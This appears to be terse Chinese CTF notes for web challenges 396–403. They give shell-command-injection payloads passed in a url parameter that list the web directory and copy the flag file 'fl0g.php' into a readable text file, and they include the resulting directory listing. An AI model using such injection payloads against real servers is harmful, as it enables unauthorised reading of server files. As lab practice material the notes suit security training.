396
传入
?url=s;cat ls -al > 1.txt
得到 flag 位置
total 24
drwxrwxrwx 1 www-data www-data 4096 Jan 16 06:31 .
drwxr-xr-x 1 root root 4096 Oct 31 2019 ..
-rw-r--r-- 1 www-data www-data 0 Jan 16 06:31 1.txt
-rw-r--r-- 1 www-data www-data 275 Jan 16 06:28 fl0g.php
-rw-r--r-- 1 www-data www-data 398 Jan 15 09:21 index.php
-rw-r--r-- 1 www-data www-data 1 Jan 16 06:31 s
传入
?url=s;cat fl0g.php > 1.txt
访问 1.txt 得到flag
397 - 402
同 396
403
Payload
http://192.168.31.75/1;cat fl0g.php > 1.txt